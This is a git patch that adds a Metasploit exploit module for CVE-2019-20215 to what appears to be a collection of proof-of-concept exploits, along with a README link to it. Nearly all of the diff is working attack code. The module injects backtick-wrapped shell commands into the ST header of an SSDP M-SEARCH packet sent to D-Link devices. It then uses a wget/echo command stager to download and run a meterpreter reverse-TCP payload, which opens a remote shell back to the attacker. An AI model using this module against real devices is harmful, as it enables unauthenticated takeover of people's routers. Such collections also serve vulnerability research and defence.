From 7f43d54912fa771779317b829f68704ed97af826 Mon Sep 17 00:00:00 2001 From: mr-xn Date: Wed, 12 Feb 2020 13:40:32 +0800 Subject: [PATCH] add D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)CVE-2019-20215 --- ... in ssdpcgi (Metasploit) CVE-2019-20215.rb | 76 +++++++++++++++++++ README.md | 1 + 2 files changed, 77 insertions(+) create mode 100644 POC_Details/D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit) CVE-2019-20215.rb diff --git a/POC_Details/D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit) CVE-2019-20215.rb b/POC_Details/D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit) CVE-2019-20215.rb new file mode 100644 index 00000000..f989c9aa --- /dev/null +++ b/POC_Details/D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit) CVE-2019-20215.rb @@ -0,0 +1,76 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Udp + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi', + 'Description' => %q{ + D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi. + }, + 'Author' => + [ + 's1kr10s', + 'secenv' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2019-20215'], + ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73'] + ], + 'DisclosureDate' => 'Dec 24 2019', + 'Privileged' => true, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'DefaultOptions' => + { + 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp', + 'CMDSTAGER::FLAVOR' => 'wget', + 'RPORT' => '1900' + }, + 'Targets' => + [ + [ 'Auto', { } ], + ], + 'CmdStagerFlavor' => %w{ echo wget }, + 'DefaultTarget' => 0 + )) + + register_options( + [ + Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']]) + ]) + end + + def exploit + execute_cmdstager(linemax: 1500) + end + + def execute_command(cmd, opts) + type = datastore['VECTOR'] + if type == "URN" + print_status("Target Payload URN") + val = "urn:device:1;`#{cmd}`" + else + print_status("Target Payload UUID") + val = "uuid:`#{cmd}`" + end + + connect_udp + header = "M-SEARCH * HTTP/1.1\r\n" + header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n" + header << "ST:#{val}\r\n" + header << "Man:\"ssdp:discover\"\r\n" + header << "MX:2\r\n\r\n" + udp_sock.put(header) + disconnect_udp + end +end \ No newline at end of file diff --git a/README.md b/README.md index 300955e6..be7ec1ea 100644 --- a/README.md +++ b/README.md @@ -22,6 +22,7 @@ - [D-Link DIR-859 - RCE UnAutenticated (CVE-2019–17621)](https://github.com/s1kr10s/D-Link-DIR-859-RCE) - [小米系列路由器远程命令执行漏洞(CVE-2019-18370,CVE-2019-18371)](https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC) - [Huawei HG255 Directory Traversal[目录穿越]](https://packetstormsecurity.com/files/155954/huaweihg255-traversal.rb.txt)|[本地备份文件](./tools/huaweihg255-traversal.rb) +- [D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)CVE-2019-20215](./POC_Details/D-Link%20Devices%20-%20Unauthenticated%20Remote%20Command%20Execution%20in%20ssdpcgi%20(Metasploit)%20CVE-2019-20215.rb) ## Web APP